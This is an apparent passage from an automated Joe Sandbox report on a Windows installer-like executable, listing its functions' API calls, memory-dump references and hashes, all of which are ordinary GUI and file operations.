                                                                                                                                                                        • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B71F
                                                                                                                                                                        • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B731
                                                                                                                                                                        • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B743
                                                                                                                                                                        • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B755
                                                                                                                                                                        • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B767
                                                                                                                                                                        • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B779
                                                                                                                                                                        • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B78B
                                                                                                                                                                        • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B79D
                                                                                                                                                                        • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7AF
                                                                                                                                                                      • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498126), ref: 0046442B
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464431
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                                                                                      • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                                                                                                      • API String ID: 2238633743-2683653824
                                                                                                                                                                      • Opcode ID: 72b69d1435c928af036fe16dce94b9a469234a73e502318fc11969645a58e7a6
                                                                                                                                                                      • Instruction ID: 48aea337371b5dbca44804c24081d1198016d0c57ab59c55e23a700f58ea278e
                                                                                                                                                                      • Opcode Fuzzy Hash: 72b69d1435c928af036fe16dce94b9a469234a73e502318fc11969645a58e7a6
                                                                                                                                                                      • Instruction Fuzzy Hash: 89B092A0640705A8CD047BB21857B0F2A4494A0B18790423B301475083EF7C88205A5E
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0047CE60 Relevance: 6.2, APIs: 4, Instructions: 195fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,0047CFD4,?,?,?,?,00000000,0047D129,?,?,?,00000000,?,0047D238), ref: 0047CFB0
                                                                                                                                                                      • FindClose.KERNEL32(000000FF,0047CFDB,0047CFD4,?,?,?,?,00000000,0047D129,?,?,?,00000000,?,0047D238,00000000), ref: 0047CFCE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Find$CloseFileNext
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2066263336-0
                                                                                                                                                                      • Opcode ID: 5765d3b0ce3c0a3b63601c2128fb054db1a7340e5b474664116a211f32de0a18
                                                                                                                                                                      • Instruction ID: d4706787225a87a8d466f388a3eb94f1c6a992d4ef98e923761ffbb9731f628b
                                                                                                                                                                      • Opcode Fuzzy Hash: 5765d3b0ce3c0a3b63601c2128fb054db1a7340e5b474664116a211f32de0a18
                                                                                                                                                                      • Instruction Fuzzy Hash: 32814B70D0024DAFCF11DF95CC91ADFBBB9EF49308F5080AAE808A7291D6399A46CF55
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0047F340 Relevance: 6.1, APIs: 4, Instructions: 147fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047F539,?,00000000,00000000,?,?,00480749,?,?,00000000), ref: 0047F3E6
                                                                                                                                                                      • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047F539,?,00000000,00000000,?,?,00480749,?,?), ref: 0047F3F3
                                                                                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,0047F50C,?,?,?,?,00000000,0047F539,?,00000000,00000000,?,?,00480749), ref: 0047F4E8
                                                                                                                                                                      • FindClose.KERNEL32(000000FF,0047F513,0047F50C,?,?,?,?,00000000,0047F539,?,00000000,00000000,?,?,00480749,?), ref: 0047F506
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Find$CloseFileNext
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2066263336-0
                                                                                                                                                                      • Opcode ID: aa959c68b470b0a8fed97b87e598cf1769bd2bf044ec79d48b11da54bddc7088
                                                                                                                                                                      • Instruction ID: 93840f20d66fcb2e286325320114c4d74e835c6895e54ad5a4f30f132b089a3b
                                                                                                                                                                      • Opcode Fuzzy Hash: aa959c68b470b0a8fed97b87e598cf1769bd2bf044ec79d48b11da54bddc7088
                                                                                                                                                                      • Instruction Fuzzy Hash: 19512F71A00658AFCB21DF65CC45ADEB7B8EB48319F5084BAA818E7341D7389F49CF54
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0042126C Relevance: 6.1, APIs: 4, Instructions: 127windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetMenu.USER32(00000000), ref: 00421359
                                                                                                                                                                      • SetMenu.USER32(00000000,00000000), ref: 00421376
                                                                                                                                                                      • SetMenu.USER32(00000000,00000000), ref: 004213AB
                                                                                                                                                                      • SetMenu.USER32(00000000,00000000), ref: 004213C7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Menu
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3711407533-0
                                                                                                                                                                      • Opcode ID: 2199c62fdc40b6f857ca540156f476da1cd3d0498d35d1cb2f117de972eee6cd
                                                                                                                                                                      • Instruction ID: 7bb7859a2cdb5f88754e70ccfd218d349751ef7fdbf43141b5448ef52fdf7b61
                                                                                                                                                                      • Opcode Fuzzy Hash: 2199c62fdc40b6f857ca540156f476da1cd3d0498d35d1cb2f117de972eee6cd
                                                                                                                                                                      • Instruction Fuzzy Hash: 0141B03070025456EB20EB3AA8857AB36D64F61308F4856BFBC44DF7A3CA7CCC5583A9
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00475394 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 114COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0042EE28: GetTickCount.KERNEL32 ref: 0042EE2E
                                                                                                                                                                        • Part of subcall function 0042EC80: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECB5
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,00475509,?,?,0049C1D0,00000000), ref: 004753F2
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CountErrorFileLastMoveTick
                                                                                                                                                                      • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                                                                                                                      • API String ID: 2406187244-2685451598
                                                                                                                                                                      • Opcode ID: 2056961f2c240f6a4405e9938ef62a00a662bef5b303526a601f0f251a19b2fb
                                                                                                                                                                      • Instruction ID: 7c456f6db07972d04682c0112793eede51d985a58d5564732b5c120557be107c
                                                                                                                                                                      • Opcode Fuzzy Hash: 2056961f2c240f6a4405e9938ef62a00a662bef5b303526a601f0f251a19b2fb
                                                                                                                                                                      • Instruction Fuzzy Hash: 5D419670A006099BCB10EFA5D882ADF77B5EF48314F608537E404BB355E7B89E458BAD
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00413CF0 Relevance: 6.1, APIs: 4, Instructions: 107COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00413D3E
                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00413DF6
                                                                                                                                                                        • Part of subcall function 00418EB8: 702FC6F0.COMCTL32(?,00000000,00413FBB,00000000,004140CB,?,?,0049B628), ref: 00418ED4
                                                                                                                                                                        • Part of subcall function 00418EB8: ShowCursor.USER32(00000001,?,00000000,00413FBB,00000000,004140CB,?,?,0049B628), ref: 00418EF1
                                                                                                                                                                      • SetCursor.USER32(00000000,?,?,?,?,00413AEB,00000000,00413AFE), ref: 00413E34
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CursorDesktopWindow$Show
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2074268717-0
                                                                                                                                                                      • Opcode ID: d2c454668ecaa59f130cbdc0d7f98644b71464a6bea9d144c6b553ceac200a13
                                                                                                                                                                      • Instruction ID: 9b0def8c9c64a2c96ee02a3ab3d0705208e3fbe4449c9c566199a376d490666d
                                                                                                                                                                      • Opcode Fuzzy Hash: d2c454668ecaa59f130cbdc0d7f98644b71464a6bea9d144c6b553ceac200a13
                                                                                                                                                                      • Instruction Fuzzy Hash: D2411931600210AFC710DF2AFA84B5677A5EB69329B16807BE405CB365DB38ED81CF9C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00408A44 Relevance: 6.1, APIs: 4, Instructions: 95windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A65
                                                                                                                                                                      • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AD4
                                                                                                                                                                      • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B6F
                                                                                                                                                                      • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BAE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LoadString$FileMessageModuleName
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 704749118-0
                                                                                                                                                                      • Opcode ID: 6e4d3cb753bdbb9908acc8cdd2b86980fc3448728ff30d06669c4a0ffee8011d
                                                                                                                                                                      • Instruction ID: 89cba0e7522a9b83fcc2071cfb28f1965358b02fab5b9b8693395207a1b0bde5
                                                                                                                                                                      • Opcode Fuzzy Hash: 6e4d3cb753bdbb9908acc8cdd2b86980fc3448728ff30d06669c4a0ffee8011d
                                                                                                                                                                      • Instruction Fuzzy Hash: A63110716083809AD330EB65CA45B9FB7D8AB85704F44483FB6C8E72D1DB7899048B6B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0044E8BC Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E905
                                                                                                                                                                        • Part of subcall function 0044CF48: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF7A
                                                                                                                                                                      • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E989
                                                                                                                                                                        • Part of subcall function 0042BBAC: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBC0
                                                                                                                                                                      • IsRectEmpty.USER32(?), ref: 0044E94B
                                                                                                                                                                      • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E96E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 855768636-0
                                                                                                                                                                      • Opcode ID: 0b47e4e74fbaa274a2738fa508d6e527e1083de5c38dc3a313e3f8e812d9ff7d
                                                                                                                                                                      • Instruction ID: fae584cc962e85b422f7b584321c3529105593e75d7f1ff9ae22b75d4be52dd2
                                                                                                                                                                      • Opcode Fuzzy Hash: 0b47e4e74fbaa274a2738fa508d6e527e1083de5c38dc3a313e3f8e812d9ff7d
                                                                                                                                                                      • Instruction Fuzzy Hash: F1116A71B4030067E610BA3A8C86B5B76C99B98748F15093FB505EB3C2DE7DDC0983A9
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00494E30 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • OffsetRect.USER32(?,?,00000000), ref: 00494E94
                                                                                                                                                                      • OffsetRect.USER32(?,00000000,?), ref: 00494EAF
                                                                                                                                                                      • OffsetRect.USER32(?,?,00000000), ref: 00494EC9
                                                                                                                                                                      • OffsetRect.USER32(?,00000000,?), ref: 00494EE4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: OffsetRect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 177026234-0
                                                                                                                                                                      • Opcode ID: 6561eb4d383449756189e8e73bad2b2324663fde54b6a94536ab2f09e4d2584d
                                                                                                                                                                      • Instruction ID: 1704218a4531d37ac2ab58ce54688b95f7f5c665c469e7ed4027bbe581d59bf2
                                                                                                                                                                      • Opcode Fuzzy Hash: 6561eb4d383449756189e8e73bad2b2324663fde54b6a94536ab2f09e4d2584d
                                                                                                                                                                      • Instruction Fuzzy Hash: C42190BA704201AFCB00DE69CD85E6BB7DAEFC4340F148A3AF944C7249E638ED058755
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00417210 Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCursorPos.USER32 ref: 00417258
                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 0041729B
                                                                                                                                                                      • GetLastActivePopup.USER32(?), ref: 004172C5
                                                                                                                                                                      • GetForegroundWindow.USER32(?), ref: 004172CC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1959210111-0
                                                                                                                                                                      • Opcode ID: 7e2e89ac6d78113517a7cdb08ff1bb3a8e6934fc8f6f5a4bd5de53d8afa5f26a
                                                                                                                                                                      • Instruction ID: d8f212eab659ab8611038d963e52f28b2b0f2619fe8d71a0b25c9b868ff876e9
                                                                                                                                                                      • Opcode Fuzzy Hash: 7e2e89ac6d78113517a7cdb08ff1bb3a8e6934fc8f6f5a4bd5de53d8afa5f26a
                                                                                                                                                                      • Instruction Fuzzy Hash: B121B0303486008AC710AB69D944AEB33F1EF58724B1145BBF8459B392DB3DDC82CB8D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00416B3A Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageA.USER32(?,?,?,?), ref: 00416B7C
                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00416B96
                                                                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 00416BB0
                                                                                                                                                                      • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BD8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Color$CallMessageProcSendTextWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 601730667-0
                                                                                                                                                                      • Opcode ID: 1f98d8ac7009f252deecc25611820889da2631f41347b52e969a5709a01d0c2e
                                                                                                                                                                      • Instruction ID: 029c09512e86dc7a5584eefc6ebe6d25086567911d505253220d4c4c80a1b89b
                                                                                                                                                                      • Opcode Fuzzy Hash: 1f98d8ac7009f252deecc25611820889da2631f41347b52e969a5709a01d0c2e
                                                                                                                                                                      • Instruction Fuzzy Hash: D4114FB5304604AFD720EE6ECDC4E9777DCAF49310715882AB55ADB602C638F8418B39
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00494AE8 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • MulDiv.KERNEL32(8B500000,00000008,?), ref: 00494AFD
                                                                                                                                                                      • MulDiv.KERNEL32(50142444,00000008,?), ref: 00494B11
                                                                                                                                                                      • MulDiv.KERNEL32(F70A2BE8,00000008,?), ref: 00494B25
                                                                                                                                                                      • MulDiv.KERNEL32(8BF88BFF,00000008,?), ref: 00494B43
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: da8da1de4e7f5bc81aa34d833cd20809ae9834e6658fde7f29423bed1a0b2134
                                                                                                                                                                      • Instruction ID: 4e21b8649f01b029d01931fbc34569bb41b57a17a8c4fb2cd57aac9c741bb68b
                                                                                                                                                                      • Opcode Fuzzy Hash: da8da1de4e7f5bc81aa34d833cd20809ae9834e6658fde7f29423bed1a0b2134
                                                                                                                                                                      • Instruction Fuzzy Hash: 1F113072605104AFCF40DFA9C8C5E9B7BECEF8D320B1541AAF908DB246D634ED418B68
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00454F50 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WaitForInputIdle.USER32(?,00000032), ref: 00454F7C
                                                                                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454F9E
                                                                                                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00454FAD
                                                                                                                                                                      • CloseHandle.KERNEL32(?,00454FDA,00454FD3,?,?,?,00000000,?,?,004551AF,?,?,?,00000044,00000000,00000000), ref: 00454FCD
                                                                                                                                                                      Memory Dump Source
